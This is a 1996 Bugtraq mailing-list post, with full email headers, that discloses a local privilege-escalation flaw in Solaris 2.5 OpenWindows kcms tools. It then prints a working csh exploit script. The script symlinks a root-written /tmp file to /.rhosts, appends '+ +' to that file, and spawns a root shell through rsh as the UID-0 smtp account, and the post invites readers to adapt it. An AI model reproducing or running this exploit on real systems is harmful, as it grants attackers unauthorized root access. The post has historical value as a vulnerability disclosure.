From proff Fri Jul 26 14:24:22 1996 Received: (proff@localhost) by suburbia.net (8.7.4/Proff-950810) id OAA09744 for best-of-security; Fri, 26 Jul 1996 14:24:22 +1000 Received: from brimstone.netspace.org ([128.148.157.143]) by suburbia.net (8.7.4/Proff-950810) with ESMTP id HAA23860 for ; Fri, 26 Jul 1996 07:35:46 +1000 Received: from netspace.org ([128.148.157.6]) by brimstone.netspace.org with ESMTP id <24855-24742>; Thu, 25 Jul 1996 17:33:57 -0500 Received: from netspace.org (netspace [128.148.157.6]) by netspace.org (8.7/8.6.12) with SMTP id RAA15085; Thu, 25 Jul 1996 17:27:16 -0400 Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8b) with spool id 194695 for BUGTRAQ@NETSPACE.ORG; Thu, 25 Jul 1996 17:19:57 -0400 Received: from netspace.org (netspace [128.148.157.6]) by netspace.org (8.7/8.6.12) with SMTP id RAA13683 for ; Thu, 25 Jul 1996 17:08:04 -0400 Approved-By: ALEPH1@UNDERGROUND.ORG Received: from cosmos.kaist.ac.kr (cosmos.kaist.ac.kr [143.248.172.41]) by netspace.org (8.7/8.6.12) with SMTP id PAA05773 for ; Thu, 25 Jul 1996 15:43:06 -0400 Received: (from beren@localhost) by cosmos.kaist.ac.kr (8.6.12h2/8.6.12) id EAA05783 for bugtraq@netspace.org; Fri, 26 Jul 1996 04:37:10 -0900 X-Mailer: ELM [version 2.4 PL21-h4] MIME-Version: 1.0 Content-Type: text/plain; charset=iso-2022-kr Content-Transfer-Encoding: 7bit Approved-By: Jungseok Roh Message-ID: <199607261337.EAA05783@cosmos.kaist.ac.kr> Date: Fri, 26 Jul 1996 04:37:10 -0900 Reply-To: Bugtraq List Sender: proff From: Jungseok Roh Subject: Zolaris 2.5 Exploited. To: Multiple recipients of list BUGTRAQ Wow.. I got a chance to use Ultra Sparc who runs Zolaris 2.5 several days ago ~ then ONe of my senior told me that there might be a Funny ,also UNCONCEIVABLE bugs in Openwindows.. I trusted him... and I traversed the file system under /usr/openwin .. there were just four SUIDed files .. ( if Admin installed openwin packages ) xlock , ff.core , kcms* .. Problem made less vague kcms_calibrate , kcms_configure is the objects we are approaching. When examining the kcms families. I found a funny stuff . kcms_configure makes the temporary(?) files in /tmp whoses permisson bit is 666 ( Wow The sign of Devil ),, definately root owns it.. IT'S NAME is Kp_kcms_sys.sem !... Then all u guys know the next procedure is . hk.. I can't show u whole the procedure right now. 'Cause My Zolaris machine is "Network Unreachible ...". One Odd thin's are Exploitation Succeeds when it interacts with kcms_calibrate!! Major procedure is making the temporary files which linked to /.rhosts then while kcms_configure tries to write /.rhosts make Thunder rolls using kcms_calibrate and Make its power Powerful.. puha.. it's like seeing Back To the Future III... then kcms_configure succeed its operation . I made a simple script exploiting the machine who has that fatal bug. hmm..but I can't erase one curiosity .. Why Sun made this humble mistake ? ... plz someboy notify this bug to SUN. I don't know Her E-mail Address .. :) (what a simple!!) script follows . this script shows u just PROCEDURE .. re-make on your demands . cat > uhit.sh << E_O_F #!/bin/csh # JungSeok. Roh ( beren@cosmos.kaist.ac.kr ) # Junior in KAIST undergraduate. Under Management Dep . set disp="cosmos.kaist.ac.kr:0.0" setenv DISPLAY $disp /bin/rm -rf /tmp/Kp_kcms_sys.sem cd /tmp #Making symbolic link ln -s /.rhosts Kp_kcms_sys.sem /usr/openwin/bin/kcms_calibrate & while(1) echo "Click the device you've chosen in kcms_calibrate window" # Choose Any profiles .. hk.. # My 2.5 machine is unreachible son I can't get exact name of that profiles. # What a fool I am.. jjap.. /usr/openwin/bin/kcms_configure -o -d $disp /usr/openwin/share/etc/devdata/profiles/Eksony17.mon if( -f /.rhosts ) then echo -n "+ +" >> /.rhosts # As u know , we can't login as root .. use smtp account. that has UID 0 !! /usr/bin/rsh localhost -l smtp csh -i endif end E_O_F __ There was a Legendary Security Task Force team whose Name is K/U/S .. But BLOWED up by KOREAN National Prosecutor.. I hate them !! ....... They make me so sad .... Laughin' in bitter tears ... hk..hk.. JungSeok Roh / Junior in KAIST / beren@cosmos.kaist.ac.kr / +82-42-869-5400